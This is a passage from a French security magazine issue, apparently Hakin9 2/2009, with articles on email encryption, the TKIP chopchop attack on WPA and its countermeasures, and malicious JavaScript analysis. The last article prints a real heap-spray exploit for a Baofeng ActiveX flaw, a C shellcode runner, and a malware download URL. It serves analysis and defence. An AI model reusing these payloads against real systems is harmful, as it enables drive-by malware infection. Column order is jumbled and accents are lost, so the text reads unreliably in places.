http://www.cryptage.org/applications-cryptographie.html Site web ddi la cryptographie, http://laurent.flaum.free.fr/pgpintrofr.htm Principe de cryptage PGP, http://dictionnaire.phpmyvisites.net/definition-CRYPTAGE-4338.htm Dfinition du cryptage, ftp://ftp.pgpi.org/pub/pgp/6.5/docs/french/IntroToCrypto.pdf Introduction la cryptographie, http://www.winpt.org/fr/faq.html : Mode d'emploi de GPG Windows (Windows Privacy Tray), http://www.gnupg.org/gph/fr/manual.html Mode d'emploi de GPG ligne de commande, http://macgpg.sourceforge.net/fr/index.html#docs Mode d'emploi de MacGPG, http://www.pgpsupport.com/ PGP 8.0 pour Windows XP, http://www.gnupg.org/ Page web de GPG, http://fr.wikipedia.org/wiki/Cryptologie, http://www.bibmath.net/crypto/index.php3.

de chiffrement peuvent cependant tre ralises dans PGPfreeware 8.0 par le presse-papiers ou la barre d'outils flottante (voir la FAQ ci-dessous). Pour GPG, soit le plug-in est inclus (Outlook Express, Eudora), soit il faut tlcharger le plug-in et l'installer, suivant le logiciel de courrier utilis. Sous Windows : Outlook Express : inclus dans WinPTGPG 1.0 (libre), Eudora : inclus dans WinPT-GPG 1.0 (libre), Thunderbird Mail : Enigmail (libre) http:// enigmail.mozdev.org/thunderbird.html, Mozilla : Enigmail (libre) http:// enigmail.mozdev.org/, Outlook : G-Data (libre) http:// www.gdata.de/gpg/download.html, Pegasus Mail : QDGPG (libre) http:// community.wow.net/grt/qdgpg.html, The Bat! : Ritlabs (shareware) http:// www.ritlabs.com/the_bat/pgp.html, Becky! 2 : BkGnuPG (freeware) http:// hp.vector.co.jp/authors/VA023900/gpgpin/index_en.html.

Eudora : Eudora-GPG (libre) http:// mywebpages.comcast.net/chang/ EudoraGPG/, Entourage : EntourageGPG (libre) http:// entouragegpg.sourceforge.net/fr_ readme.html, Thunderbird Mail : Enigmail (libre) http:// enigmail.mozdev.org/thunderbird.html, Mozilla : Enigmail (libre) http:// enigmail.mozdev.org/.

Conclusion

Importer la cl publique de ses correspondants pour la stocker.

GPG et PGP permettent l'importation de la cl de vos correspondants dans votre trousseau de cls publiques par la fonction import . Ensuite, lorsque vous enverrez un e-mail un de ces correspondants, le plug-in courrier se chargera de trouver le cadenas de ce correspondant (sa cl publique) dans votre trousseau de cls publiques PGP, puis il cryptera automatiquement le message avant envoi.

Sous Linux : KMail (KDE) : inclus dans KMail, Thunderbird Mail : Enigmail (libre) http:// enigmail.mozdev.org/thunderbird.html, Mozilla : Enigmail (libre) http:// enigmail.mozdev.org/, Evolution (Gnome) : inclus dans Evolution.

Utilisation proprement dite de OpenPGP

La faon la plus simple d'utiliser OpenPGP est d'installer un plug-in (une extension) : ce plug-in ajoute dans le logiciel e-mail une icone OpenPGP sur laquelle il suffira de cliquer pour crypter ou dchiffrer le message (ou signer et vrifier). PGPfreeware 8.0 ne fournit pas de plugins courrier. Pour obtenir les plug-ins PGP 8.0, il faut acqurir la version payante (voir http://www.pgpeurope.com). Les oprations

Dans cet article, nous avons prsent quelques possibilits dinterception et de lecture des paquets. Il existe encore beaucoup dautres techniques qui permettent de lire les paquets envoys sur le rseau. Pour viter que le trafic rseau ne soit cout, il convient de le crypter tout simplement. Il existe plusieurs faons de mettre en place un systme de cryptage. On peut crypter soit le message avant de lenvoyer, soit le canal de transmission, soit les deux simultanment. Il est cependant important de sinformer quotidiennement de la solidit du systme de cryptage que vous utilisez car ces algorithmes peuvent tre casss du jour au lendemain et les spcialistes et chercheurs y travaillent jour et nuit. En somme, crypter est bien mais sassurer de bien crypter avec les outils les plus srs du moment, cest encore mieux. La veille technologique simpose donc.

Sous MacOS X : Apple Mail : GPGMail for OSX (libre) http://www.sente.ch/software/GPGMail/,

Ignace K. Kueviako

Ignace Kangni Kueviako est un ingnieur en informatique et rseau. Il enseigne les cours de programmation et de rseau informatique au Groupe ESIBA (TOGO) o il travaille aussi en tant qu'administrateur de rseau. Il s'intresse beacoup la scurite informatique. Pour contacter l'auteur : kignace14@yahoo.fr 2/2009 HAKIN9 43

36_37_38_39_40_41_42_43_Cryptage.indd

43

2009-01-09, 11:37

TECHNIQUE
LEVIER LAURENT

Degr de difficult

Nouvelle faiblesse dans la technologie WiFi

Ds sa sortie, la technologie WiFi a rvl moultes erreurs dans la conception de ses mcanismes de scurit. Ainsi, trs rapidement, il est devenu possible dutiliser tout point daccs WiFi disponible. WEP ntant plus scuris, WPA a t mis en place pour palier ces carences, mais WPA est maintenant son tour sur la sellette.

CET ARTICLE EXPLIQUE...

Comment rduire le risque li aux technologies WiFi et leurs faiblesses.

epuis lexistence de la technologie WiFi, de nouvelles faiblesses ont t rgulirement dcouvertes au niveau des mcanismes de scurit destins garantir une confidentialit des changes. Ainsi, trs rapidement, WEP (Wired Equivalent Privacy) a prsent des carences dans sa conception qui ont dbouch sur la capacit de dterminer la cl de chiffrement utilise et ainsi le dcodage complet des flux changs avec un point daccs en moins de quelques minutes. Afin de combler ces carences, WPA (WiFi Protected Access) a t dvelopp. Rcemment, la socit ElcomSoft a fait une annonce ( voir l'encadr Sur Internet [1]) indiquant quils avaient russi casser le chiffrement de WPA grce une nouvelle technologie base sur lutilisation des processeurs graphiques NVidia qui permettait de multiplier par 100 la performance dun test itratif des cls par rapport aux logiciels nutilisant que les processeurs traditionnels. Mais est-ce vraiment cette annonce qui rend WPA apocryphe?

graphiques NVidia comme unit de calcul. Il nen reste pas moins quune cl de 8 caractres dont chacun pourrait tre une minuscule, majuscule ou un signe, soit 26+26+10 possibilits par caractre engendrera tout de mme 628 possibilits, soit prs de 220 000 milliards. En admettant quil soit possible de tester un million de cls par seconde, il faudra plus de 2500 jours, soit prs de 7 ans, pour tester toutes les cls. Par consquent, un mot de passe dune taille raisonnable nest pas prt dtre cass par une attaque par force brute, surtout considrant que la cl peut monter jusqu 63 caractres, soit 8 10112 possibilits. En ralit, le nouveau risque li lutilisation de WPA provient dune faiblesse de conception de TKIP (Temporal Key Integrity Protocol) rvle peu aprs lannonce sensation dElcomSoft.

TKIP

Attaquer WPA par force brute

CE QU'IL FAUT SAVOIR...

Bases de la technique du Wifi notions de base du cryptage du WEP.

La scurit de WPA repose sur une cl, en ralit un mot de passe, qui sert chiffrer les donnes changes. Cette cl, appele PSK (Pre-Shared Key), a une longueur pouvant aller de 8 256 bits, soit de 8 63 caractres ASCII. ElcomSoft affirme tre mme de tester 50 000 cls par seconde en sappuyant sur des processeurs

TKIP est un protocole destin combler les faiblesses dcouvertes dans WEP, tout en vitant une modification des matriels WiFi. En effet, au dpart, WPA devait sappuyer sur le protocole AES-CCMP (Advanced Encryption Standard Counter-Mode/CBC-Mac Protocol) mais celui-ci est si gourmand en calcul quil est ncessaire de lui mettre disposition un processeur spcialis, ce qui rendait obsoltes tous les matriels dj existants. TKIP a donc pour but de mettre en place des contre-mesures

44

HAKIN9 2/2009

44_45_46_47_WiFi.indd

44

2009-01-06, 19:16

WPA
dans le but de faire chouer toutes les attaques WEP connues et ainsi rendre nouveau le WiFi digne de confiance, sans pour autant ncessiter un changement de matriel. Avant tout, il faut signaler un point important : TKIP sappuie sur WEP. Par consquent, compte tenu que WEP se casse trs facilement, TKIP ne doit compter que sur lui pour sa scurit. WEP chiffrait les donnes avec une cl constante, laquelle il ajoutait un vecteur dinitialisation (IV) diffrent. Cette mthode ayant t dfaite par les attaques de type FMS, KoreK ou PTW bases sur la capture passive de paquets puis la dtermination de la cl par analyse des donnes captures, TKIP va lui renouveler la cl priodiquement. De plus, contrairement WEP qui transmettait lIV en clair, ce qui a permis de casser WEP rapidement, TKIP lui, va envoyer un hachage de lIV sur les ondes. Par ailleurs, TKIP ajoute un code dauthentification du message : MIC (Message Integrity Code) galement appel Michael, qui permet de lutter contre les attaques de checksum CRC32 qui existent avec WEP. TKIP met galement en place un compteur de squence (TSC = TKIP Sequence Counter ) pour garantir larrive squentielle des paquets et ainsi empcher les attaques de rejeu (replay). Pour lutter contre lattaque chopchop (voir l'encadr Sur Internet [2]), TKIP va dtruire tout paquet reu si celuici un ICV (Integrity Check Value) incorrect. Si lICV est correct, mais que Michael ne lest pas, alors le paquet est considr comme une tentative dattaque malveillante. Dans ce cas, TKIP renvoie un paquet MIC failure report frame et arme un compteur de 60 secondes. Si dans ce laps de temps un autre paquet avec un ICV correct et un MIC incorrect est reu, TKIP lance une procdure de mise jour de la cl. Dans le cadre des changes normaux de paquets, TKIP incrmente le TSC du canal correspondant. En cas de rception dun paquet avec un TSC infrieur avec celui attendu, le paquet est galement dtruit.

La mthode chopchop modifie de Beck/Tews

a i

Eric Tews, chercheur lUniversit de Dresden, et Martin Beck, de lUniversit de Darmstadt, ont dcrit dans un document [2] une nouvelle mthode dcoulant dune technique chopchop modifie et adapte WPA. Cependant, cette technique ncessite la satisfaction de contraintes pour russir. Comme nous lavons indiqu prcdemment, WPA peut fonctionner en sappuyant sur TKIP ou CCMP. La technique reposant sur TKIP, celui-ci doit tre utilis par le point daccs. Il est ncessaire que lchange se fasse sur un plan dadressage connu par la personne malveillante. Ainsi, il lui est possible de dduire la plus grande partie du codage des adresses IP. A ce niveau, la documentation des matriels utiliss qui fourniront la configuration par dfaut et souvent celle mise en uvre, sera une aide prcieuse. TKIP chiffre les paquets avec une cl renouvele priodiquement, il est ncessaire que la dure de vie de la cl soit suffisamment longue afin que lattaque puisse russir. Par exemple, avec un dlai de renouvellement dune heure, lattaque sera possible. L encore, la documentation du matriel utilis sera une aide prcieuse en rvlant la configuration par dfaut. Enfin, afin de fournir une meilleure Qualit de Service, la technologie WiFi permet dutiliser simultanment plusieurs canaux (ou TID = Traffic IDentifier) diffrents (de 0 7). Cette

fonction fait partie des spcifications 802.11e. Si cette fonction est active, elle permet daugmenter considrablement la russite de cette technique en multipliant par 8 la vitesse de test des diffrentes possibilits et en facilitant la dtermination des TSC car le plus souvent toute la communication se fait sur le canal 0, ce qui rend le TSC nettement infrieur ou nul, sur les autres canaux.

La technique

Le pirate va commencer par capturer des paquets en transit entre une machine et un point daccs jusqu ce quil obtienne un paquet de requte ARP (ARP request ) ou sa rponse (ARP reply). Dans ce type de paquet de trs petite taille, le contenu est aisment prvisible car il ne contient au final que des adresses MAC et des adresses IP, les adresses MAC ne sont pas chiffres, et le paquet est envoy vers une adresse de broadcast. De plus, le contenu du paquet (lorsquil est en clair) est normalis. Au final, il ne faudra en fait dcoder que les 12 octets de fin de paquet qui reprsentent pour 8 octets le MIC et pour 4 octets le checksum ICV. Grce aux outils ( voir l'encadr Sur Internet [3]) quils ont adapts cette nouvelle mthode, lattaque va donc pouvoir tre initie. Il faut noter que Martin Beck fait partie de lquipe de dveloppeurs de loutil AirCrack, ce qui explique pourquoi la nouvelle version disponible permet dj cette attaque. Le cassage de WPA sera effectu par la technique dite chopchop. Lattaque

Figure 1. Tunnel VPN sur un lien WiFi

2/2009 HAKIN9 45

44_45_46_47_WiFi.indd

45

2009-01-06, 19:16

TECHNIQUE
consiste ter un octet du paquet captur et le renvoyer sur le canal aprs avoir recalcul le checksum ICV. Si lICV est correct et compte tenu que Michael ne le sera pas, le point daccs renverra un paquet MIC failure report frame. En revanche, si lICV est incorrect, le paquet sera dtruit silencieusement. Ainsi, le pirate pourra dterminer le rsultat de lenvoi de son paquet modifi. Compte tenu quil faut patienter 60 secondes aprs la rception dun paquet MIC failure report frame pour ne pas provoquer la gnration dune nouvelle cl, il faudra, raison dune tentative par minute, environ 12 minutes au total pour dterminer les octets composant le MIC et lICV. Une fois ces informations obtenues, par comparaison de son paquet forg en respectant le MIC et lICV avec le paquet captur au dpart, le pirate pourra dterminer les adresses IP utilises et obtenir ainsi lintgralit du paquet en clair. du point daccs lui-mme. De plus, sil y avait des sondes dintrusion (IDS = Intrusion Detection System), alors celles-ci pourraient galement tre utilises contre le point daccs. Enfin, si le pirate pouvait dcoder le MIC dans les deux sens du flux (mission et rception), il serait mme de fabriquer autant de paquets avec un contenu sa discrtion quil voudra et les envoyer sur le rseau. Mais on peut se demander sil ne serait pas intressant dempiler les technologies lorsque lon parle dutiliser du WiFi. En effet, on constate quavec le temps de nouvelles faiblesses sont dcouvertes et il existe dores et dj des solutions applicatives qui pourraient tre utilises au dessus du WiFi afin de ne pas faire reposer la confidentialit que sur WEP, WPA ou WPA2 uniquement. De plus, nombreuses sont les entreprises qui imposent lutilisation de leur solution ExtraNet sur leurs points daccs WiFi dans le but de rduire les risques daccs non autoris.

Les moyens de lutte

Les consquences

Soyons ralistes Ici, la cl de chiffrement des paquets nest pas compromise et par consquent la situation nest pas aussi dramatique quavec lutilisation de WEP car les donnes changes restent encore confidentielles. Cependant, si le risque est bien moindre, il reste non ngligeable car il peut permettre de provoquer des dnis de service sur la relation dune machine avec son point daccs ou mme

Fort heureusement, il existe de simples actions effectuer pour se prvenir contre ce risque. Ainsi, paramtrer le point daccs pour quil rgnre la cl, par exemple, toutes les deux minutes suffira mettre en chec cette nouvelle attaque. Si cest possible, modifier la configuration afin quaucun paquet MIC failure report frame ne soit renvoy permettra galement de rendre aveugle le pirate qui, du coup, ne pourra plus mener bien son attaque. Et bien sr, lidal reste de ne plus utiliser TKIP mais CCMP qui fait partie dAES. AES, qui est galement le protocole utilis dans WPA2 a t approuv par le NIST (National Institute of Standards and Technology) et est considr, lheure actuelle, suffisamment robuste pour tre utilis par le Gouvernement des Etats-Unis comme algorithme de chiffrement pour ses donnes jusquau niveau Top Secret . Donc, autant que possible, migrer vers WPA2 est un bon placement.

Quelles solutions applicatives pour ne pas tre tributaire de la scurit WiFi?

Avant tout, quelle que soit la solution, celleci doit exiger une nouvelle authentification. Idalement, il ne serait pas utile dauthentifier laccs au point daccs, voire mme de le laisser fonctionner en clair. Lutilisateur se connecterait donc au point daccs, lequel ne lui permettrait que de sauthentifier pour utiliser la solution ExtraNet hberge sur le hotspot WiFi.

Lauthentification forte

Idalement, lauthentification doit tre forte, cest--dire deux facteurs. Le plus souvent, une authentification simple, donc un seul facteur, est utilise. Il sagit en gnral dun ce que lutilisateur connat , savoir son nom daccs (login) et le mot de passe statique associ. Cependant, un second facteur peut exister, tel ce que lutilisateur dtient , ou ce que lutilisateur est . Ainsi, une calculatrice gnrant des mots de passe usage unique ou une analyse dempreinte digitale ou rtinienne par exemple peut tre un second facteur.

VPN au dessus du WiFi

Figure 2. Solution VDI au dessus dun lien WiFi

46 HAKIN9 2/2009

Une fois lutilisateur connect sur le point daccs, celui-ci ne doit pouvoir lui laisser faire quune seule action : lancer le logiciel client destin tablir, par exemple, un tunnel IPsec ou SSL aprs authentification. Ce type de passerelle noffrant que cet unique service, tant architecture et scurise afin dtre accessible depuis Internet, leur niveau de protection est souvent renforc et le suivi de leurs mises jour scrupuleusement effectu.

44_45_46_47_WiFi.indd

46

2009-01-06, 19:16

WPA
Le client WiFi devra donc sauthentifier sur cette nouvelle passerelle, laquelle pourra utiliser un serveur dauthentification de type Radius ou Tacacs par exemple. Une fois fait, un tunnel VPN (Virtual Private Network) est tabli au dessus du lien WiFi telle que le montre la Figure 1. Le tunnel tant chiffr et pouvant mme intgrer dautres fonctions comme la dtection du NAT (si on parle dun tunnel IPsec), lensemble est donc dun niveau de scurit nettement suprieur celui dun accs WiFi classique. Cependant, ce type de solution prsente des inconvnients. Ainsi, lorsque seule la technologie WiFi est utilise, le passage hors de porte, puis nouveau porte dun autre ou du mme point daccs ne provoquera quune coupure ponctuelle, le lien tant rtabli automatiquement. Au rtablissement du lien WiFi, lutilisateur dispose donc nouveau dune adresse IP dans le rseau et peut continuer ses actions en cours. Lorsquun tunnel est en plus tabli, la mme situation va provoquer une perte du tunnel mais, pour le rtablir, il faut repasser par la phase dauthentification. Pire encore, selon le paramtrage de lauthentification et de la passerelle, il pourra falloir attendre un dlai pour se reconnecter la passerelle. Cependant, il nen reste pas moins que lensemble est bien plus robuste quavec un lien WiFi simple. En admettant quune personne malveillante arrive casser la scurit du lien WiFi (WEP, WPA ou WPA2), elle se trouve face un flux lui-mme chiffr quil lui faut nouveau casser. De plus, hormis avec des paquets spcialiss tels les requtes ARP, le pirate ne peut pas avoir la moindre ide du contenu en clair dun paquet car en ralit, aucun paquet ne transite sur le lien WiFi sans avoir t pralablement chiffr par la solution de tunnel VPN.

Un relais applicatif

Une autre approche, plus rarement utilise, consiste sappuyer sur une solution de relais applicatif tel un reverse proxy ou un VDI (Virtual Desktop Infrastructure). Le principe de fonctionnement dun relais applicatif est, par opposition un tunnel VPN par exemple, que lutilisateur nest pas reli directement au rseau, mais une machine quil va utiliser pour atteindre le rseau, en rebondissant sur celle-ci. Seule cette machine est relie au rseau. Ainsi, un reverse proxy HTTP ou HTTPS, cas le plus connu de relais applicatif, permet de forcer un goulet dtranglement o seront appliqus des contrles daccs plus draconiens. De plus, ces contrles daccs fonctionnant au niveau applicatif, ils permettront une granularit plus forte. Cependant, un reverse proxy WWW nest pas ici la meilleure solution car il est trop limitatif dans ses fonctionnalits pour permettre lutilisation dun vaste ventail de solutions diffrentes (WWW, clients lourds, connexions des bases de donnes relationnelles). Une approche bien plus souple consiste effectuer du VDI. Le VDI, exprim simplement, nest quune technologie o un serveur, sur lequel lutilisateur doit se connecter, effectue en lieu et place de lutilisateur les actions, comme le montre la Figure 2. Par consquent, le poste de travail de lutilisateur nest pas reli au rseau et ne fera aucune action autre que de rester synchronis avec laffichage du serveur VDI. Selon le logiciel VDI choisi, lutilisateur distant pourra se voir contraindre utiliser un client lourd, ou avoir la possibilit de voir laffichage encapsuler dans une page HTTPS qui sappuie par exemple sur la technologie Java comme client lourd. Dans ce second cas, lutilisateur na donc besoin que dun navigateur (Internet Explorer ou

Firefox par exemple) pour pouvoir disposer des outils ncessaires ltablissement de sa session. Lutilisateur se trouve donc dans une situation de session distance. Bien sr, il faudra choisir le logiciel VDI pour sa souplesse et aussi ses fonctions de scurit. Il peut tre mme possible de faire du Windows Terminal Server (si le serveur est en Windows 2003 afin que le patch SSL soit appliqu car sinon le chiffrement de ce logiciel est trop insuffisant), du Citrix ou du VMware par exemple. Cette solution prsente entre autres galement lavantage de garantir un poste de travail standard sur le rseau, toujours maintenu et conforme aux politiques de lentreprise puisque lutilisateur na aucun privilge autre que le droit de lutiliser. Sil nest pas possible denvoyer un fichier vers le poste VDI, alors il ny aura plus de risque de transmission dun virus ou dun ver par ce canal. Si lutilisateur a besoin de donnes personnelles, alors ltablissement dun lien vers une ressource disque partage o sera hberg son rpertoire personnel satisfera ce besoin. En revanche, il pourra rester le fait que les favoris par exemple, ou le paramtrage personnalis des logiciels du poste VDI (tel le client de messagerie par exemple) pourrait ne pas tre possibles.

Conclusion

Sur Internet
http://www.elcomsoft.com/news/268.html Practical attacks against WEP and WPA Martin Beck, TU-Dresden, Germany, Erik Tews, TUDarmstadt, Germany November 8, 2008 - http://dl.aircrack-ng.org/breakingwepandwpa.pdf

Malgr de nouvelles faiblesses dcouvertes rgulirement, la technologie WiFi, si celle-ci repose sur WPA2 ou du chiffrement AES, reste digne de confiance. Cependant, pour lentreprise qui se mfie de la scurit des solutions WiFi, il existe toujours des moyens dempiler dautres systmes de scurit sur les points daccs. Ces solutions qui peuvent rclamer leur propre authentification, offrent la possibilit dtablir un tunnel chiffr au dessus du point daccs, ou de rebondir sur une machine en mode session, laquelle serait connecte au rseau dentreprise et sous son contrle exclusif. Ainsi, toutes les garanties possibles de scurit sont apportes. Laurent Levier

Les outils adapts cette nouvelle technique sont : Aircrack-ng http://www.aircrack-ng.org Tkiptun-ng http://www.aircrack-ng.org/doku.php?id=tkiptun-ng Chopchop http://www.netstumbler.org/f50/chopchop-experimental-wep-attacks-12489/

Laurent Levier est Directeur Dlgu la Scurit du Systme dInformation chez Equant Tlcommunications, filiale du Groupe France Tlcom, depuis une dizaine dannes. Auparavant, Consultant en Scurit des Systmes dInformation. Pour contacter l'auteur : llevier@argosnet.com. 2/2009 HAKIN9 47

44_45_46_47_WiFi.indd

47

2009-01-06, 19:16

TECHNIQUE
DAVID MACIEJAK

Degr de difficult

Obfuscation Javascript Partie 2

Dans cette deuxime et dernire partie, vous verrez comment analyser les shellcodes et nous dtaillerons dautres vecteurs dattaques possibles.

ous commencerons par l'anayse du Shellcode. Les scripts offusqus dlivrent un script malicieux qui utilise des mthodes vulnrables comme le tlchargement d'un fichier arbitraire ou exploite un overflow dans un composant ActiveX, il inclut donc un shellcode permettant d'excuter du code. Ce dernier est gnralement un shellcode download&execute utilis pour sauver un malware sur le poste de la victime.

Shellcode en hexadecimal/ unicode

La valeur est utilise pour remplir un tableau. Mais quoi cela peut il bien correspondre ? Cette technique est utilise pour remplir la heap car nous pouvons dterminer avec exactitude sa position lorsque l'overflow aura lieu. Cette technique est appele Heap Spray. La prsentation d'Alexander Sotirov ou l'article Wikipedia vous en apprendront plus (voir la section Sur Internet). Il explique l'utilit de la mthode substring ou de l'oprateur + dans une boucle for pour crire sur la heap. De nombreux blocs sont allous et la dernire ligne de script tre appele est
yings["rawParse"](chilam)

CET ARTICLE EXPLIQUE...

Comment analyser un shellcode Comment identifier une attaque

CE QU'IL FAUT SAVOIR...

Des notions de langage Javascript et VBScript Des notions d'assembleur

Nous allons voir dans cette partie comment dbuguer un shellcode pour comprendre ce qu'il fait en tche de fond. L'tape suivante est l'tude du Listing 1. Premirement, comme vous le voyez, l'objet ActiveX est cr en utilisant la mthode DOM Javascript et suivi par le shellcode qui utilise un encodage Unicode et qui est sauv dans une variable nomme shellcode. Dans un second temps, nous allons dbuguer ce shellcode pour comprendre ce qu'il fait mais,auparavant, intressons-nous la variable shellcode. Aprs l'initialisation, nous voyons que shellcode est utilise dans une boucle for:
for (i=0; i<300; i++) qq784378237[i] = block + shellcode;

En fait, ce code est une des nombreuses manires de Javascript d'crire un appel de fonction. Ce code est identique
yings.rawParse(chilam)

C'est donc un appel la mthode rawParse de l'objet yings (dfini en dbut de code) :
6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB

il s'agit du composant ActiveX Baofeng Storm MPS.StormPlayer.1 (mps.dll). Cette vulnrabilit est rfrence en tant que CVE-2007-4816. Identifions ce que le shellcode fait.

48

HAKIN9 2/2009

48_49_50_51_52_53_54_55_56_57_58_Javascript.indd

48

2009-01-09, 11:38

SCRIPTS MALICIEUX
La mthode que nous allons dcrire n'exige pas que le composant ActiveX vulnrable soit install, nous verrons comment crer un excutable et l'excuter dans un dbugueur. code par IDA et non pas comme data qui est la valeur par dfaut. Vous devez vous dplacer dans le code assembleur pour trouver une grosse partie de db ou juste cliquer sur la chaine EEEEtn dans la fentre des chanes pour sauter immdiatement au dbut du shellcode (voir Figure 4). Une fois sur le code, vous pouvez forcer IDA l'identifier en tant que tel en appuyant sur la touche C. Listing 1. Shellcode identifier
yings=document.createElement("object"); yings.setAttribute("classid", "clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB"); var shellcode = unescape("%u90"+"90" + "%u90"+"90" + "%uefe9"+ ... + %u0065"); var bigblock = unescape("%u9090"+"%u9090"); var cuteqqoday; cuteqqoday = 20; var cuteqqoday2; cuteqqoday2 = cuteqqoday+shellcode.length; while (bigblock.length<cuteqqoday2) bigblock+=bigblock; fillblock = bigblock.substring(0, cuteqqoday2); block = bigblock.substring(0, bigblock.length-cuteqqoday2); while(block.length+cuteqqoday2<0x40000) block = block+block+fillblock; cuteqqsss = new Array(); qq784378237 = cuteqqsss; for (i=0; i<300; i++) qq784378237[i] = block + shellcode; var chilam = ''; while (chilam["length"] < 4057) chilam+="\x0a\x0a\x0a\x0a"; chilam+="\x0a"; chilam+="\x0a"; chilam+="\x0a"; chilam+="\x0a\x0a\x0a\x0a"; chilam+="\x0a\x0a\x0a\x0a"; yings["rawParse"](chilam)

%u9090%u9090%uefe9%u0000%u5a00... %u776f%u2e6e%u7865%u0065

Vous obtiendrez le code correspondant pour la section entire comme dans la Figure 5. Maintenant, vous pouvez suivre l'excution du code et identifier d'autres chanes de caractres. Vous devez ensuite slectionner les blocs et appuyer sur la touche U correspondant Undefine ou choisir l'option dans le menu droulant du bouton de droite. Ensuite, choisissez plusieurs

Comme vous le voyez, il dbute par l'oprateur 90, qui sont des NOPs, suivi par un %uefe9 qui correspond un jump, efe9 doit tre lu comme E9 EF. Le script du Listing 2 devrait aider pour transformer le shellcode Unicode en hexadcimal. Nous devons maintenant l'ajouter dans un programme C comme celui du Listing 3 et le compiler pour poursuivre notre investigation. Ce code a pour effet d'appeler le shellcode, vous pouvez utiliser Dev-C++ sous Microsoft Windows pour le compiler. Une fois le binaire obtenu, voyons comment le dboguer. De nombreux dbogueurs existent comme Ollydbg (gratuit) ou IDA. Les captures d'crans suivantes sont prises d'IDA mais vous pouvez faire la mme chose avec Ollydbg. Glissez et dposez le binaire compil sur le raccourci IDA, la fentre d'ouverture de nouveau fichier s'affiche (voir Figure 1). Cochez Charger les ressources et validez par le bouton Ok. L'cran principal d'IDA s'ouvre et le moteur commence analyser le sample (voir Figure 2). Jetez un rapide coup d'il la fentre des Chaines pour voir si vous pouvez identifier quelque chose La capture de la Figure 3 montre les principales cls du shellcode. urlmon(.dll) doit tre charg pour trouver la mthode URLDownloadToFileA afin de sauver en tche de fond http:// qqq.hao1658.com/down.exe (grande probabilit que ce fichier soit un virus, au moment de l'criture ce lien tait inaccessible) dans le rpertoire systme (GetSystemDirectoryA) et ensuite WinExec sera appel afin d'excuter ce fichier. Pour tre sr de cette analyse rapide, vous pouvez le dboguer. Pour cela, allez sur le bloc correspondant au shellcode dans le binaire afin de l'identifier comme

Listing 2. Conversion Unicode vers hexadcimal

#!/usr/bin/perl $var="%u..."; @tab=split("%u",$var); for ($i=1;$i<@tab+0;$i++) { print("\\x".substr($tab[$i],2,2)."\\x".substr($tab[$i],0,2)); } print"\n"; Le rsultat est le suivant: \x90\x90\x90\x90\xe9\xef\x00\x00\x00\x5a... \x6f\x77\x6e\x2e\x65\x78\x65\x00

Listing 3. Programme C pour compiler le shellcode

#include <stdio.h> unsigned char shellcode[] = "\x90..."; int main() { void (*c)(); printf("Shellcode here!\n"); *(int*)&c = shellcode; c(); }

2/2009 HAKIN9

49

48_49_50_51_52_53_54_55_56_57_58_Javascript.indd

49

2009-01-06, 19:17

TECHNIQUE
lignes et pressez la touche A pour crer une chane (ou choisir l'option dans le menu du bouton de droite). Si le code utilise un encodage XOR il peut tre prouvant de suivre le code, la meilleure solution est de suivre l'excution en temps rel. Pour cela, vous devez au pralable identifier une instruction et y positionner un breakpoint. Un breakpoint est un flag sur une instruction qui indique au dbogueur de stopper l'excution et de faire tourner le code suivant tape par tape command par l'analyste. Les breakpoints peuvent tre positionns en pressant la touche F2, la couleur de la ligne d'instruction devient alors rouge. Notez que, par dfaut, les breakpoints sont de type software, un breakpoint hardware peut tre configur en cliquant avec le bouton de droite sur la ligne rouge et en choisissant dans le menu d'diter le breakpoint. De l, vous pouvez configurer le type de breakpoint (hardware) et le mode d'excution (comme le montre la figure 6). Ce breakpoint utilisera donc les registres spciaux du CPU X86 qui sont faits cet effet, ceci peut prvenir la dtection par un sample malicieux. Aprs avoir configur les breakpoints, nous pouvons excuter le programme en appuyant sur la touche F9 et suivre le flot d'excutions en pressant F8 (ou F7 si vous voulez une analyse approfondie). Vous verrez que le code, comme suspect, essaye de tlcharger un fichier malicieux, de l'enregistrer dans C:\WINDOWS\SYSTEM32\a.exe et de l'excuter en prfixant son chemin par cmd /c.

Figure 1. Charger le fichier dans IDA

Toolkits dexploitation web

Depuis quelques annes, nous avons vu des organisations criminelles travailler sur des packs d'exploit incluant des interfaces de management des donnes en PHP comme, pour en citer quelquesuns, Mpack et Neosploit. Ces outils sont utiliss pour crer des serveurs malicieux. Ils embarquent de nombreux exploits, comme le prsente la liste suivante, qui peuvent tre configurs pour ne cibler que des applications, clients web ou domaines spcifiques.
50 HAKIN9 2/2009

Figure 2: Environnement d'IDA

48_49_50_51_52_53_54_55_56_57_58_Javascript.indd

50

2009-01-06, 19:17

SCRIPTS MALICIEUX
Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution Vulnerability Microsoft Windows Vector Markup Language Buffer Overrun Vulnerability Microsoft Windows Cursor And Icon ANI Format Handling Remote Buffer Overflow Vulnerability Xunlei Thunder PPLAYER.DLL_1_WORK ActiveX Control Buffer Overflow Vulnerability SSReader Ultra Star Reader ActiveX Control Register Method Buffer Overflow Vulnerability BaoFeng Storm MPS.DLL ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities PPStream PowerPlayer.DLL ActiveX Control Buffer Overflow Vulnerability Xunlei Web Thunder ActiveX Control DownURL2 Method Remote Buffer Overflow Vulnerability Yahoo! Webcam ActiveX Control Buffer Overrun Vulnerability Baidu Soba Search Bar BaiduBar.DLL ActiveX Control Remote Code Execution Vulnerability RealPlayer 'rmoc3260.dll' ActiveX Control Memory Corruption Vulnerability RealPlayer 'ierpplug.dll' ActiveX Control Stack Buffer Overflow Vulnerability a t ajout. En outre, ce code est coup en 2 parties (2 tags javascript). La premire chose faire avant de l'analyser est donc de le nettoyer. Quelques quote et double quote ont t chapps pour rendre l'analyse plus difficile, nous n'avons pas besoin de comprendre la totalit mais il est important de voir l'usage de la fonction xQ94 et de l'appel document.write. Le listing 5 prsente une version propre du Listing 4. Pour dsoffusquer le code, vous avez juste besoin d'craser l'appel write par un print et de le lancer dans votre dbogueur prfr. Vous obtiendrez le code du Listing 6 ; comme vous le voyez, ce code charge un ActiveX 78ABDC59D8E7-44D3-9A76-9A0918C52B4A qui correspond au composant Sina Downloader, un outil populaire en Chine. Il utilise une erreur de design dans la mthode DownloadAndInstall pour effectuer des oprations malicieuses.

Figure 3. Fentre de Chaines dans IDA

